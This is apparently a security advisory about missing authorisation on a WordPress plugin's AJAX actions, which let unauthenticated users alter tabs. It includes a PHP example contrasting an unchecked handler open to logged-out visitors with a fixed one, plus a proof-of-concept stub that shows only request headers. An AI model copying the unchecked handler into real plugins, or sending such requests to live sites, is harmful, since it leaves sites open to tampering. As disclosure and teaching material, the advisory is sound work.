All AJAX actions of the plugin are available to both unauthenticated and authenticated users, allowing unauthenticated attackers to modify various data in the plugin, such as adding, editing or deleting arbitrary tabs.
v1.3.0 added CSRF checks; however, authorisation was still missing and was added in 1.3.2.
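The pattern described above, as an added example that is not the plugin's own code: a handler reachable through both AJAX hooks with no checks, next to one that performs a CSRF (nonce) check and a capability check, the two kinds of check the advisory says arrived in 1.3.0 and 1.3.2. The action names, option name, nonce field and the `manage_options` capability are assumptions made for illustration.

```php
<?php
// Hypothetical identifiers throughout: the plugin's real action and option
// names are not shown on this page.

// Before: the handler is hooked for logged-in users (wp_ajax_*) and for
// logged-out visitors (wp_ajax_nopriv_*), and checks nothing itself.
add_action( 'wp_ajax_example_save_tab_before', 'example_save_tab_unchecked' );
add_action( 'wp_ajax_nopriv_example_save_tab_before', 'example_save_tab_unchecked' );

function example_save_tab_unchecked() {
    $tabs   = get_option( 'example_tabs', array() );
    $tabs[] = sanitize_text_field( wp_unslash( $_POST['title'] ?? '' ) );
    update_option( 'example_tabs', $tabs );
    wp_send_json_success();
}

// After: no nopriv hook, then a CSRF check, then an authorisation check.
add_action( 'wp_ajax_example_save_tab', 'example_save_tab_checked' );

function example_save_tab_checked() {
    // CSRF check. A nonce ties the request to a session and an action, but any
    // user who was issued one passes, so it does not replace the next check.
    if ( ! check_ajax_referer( 'example_save_tab', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }

    // Authorisation check. Which capability is appropriate is an assumption;
    // 'manage_options' limits the action to administrators.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    $tabs   = get_option( 'example_tabs', array() );
    $tabs[] = sanitize_text_field( wp_unslash( $_POST['title'] ?? '' ) );
    update_option( 'example_tabs', $tabs );
    wp_send_json_success();
}
```

When reviewing a plugin for this class of issue, every callback attached to a `wp_ajax_` or `wp_ajax_nopriv_` hook that changes state should contain both checks, since WordPress performs neither on the handler's behalf.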
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8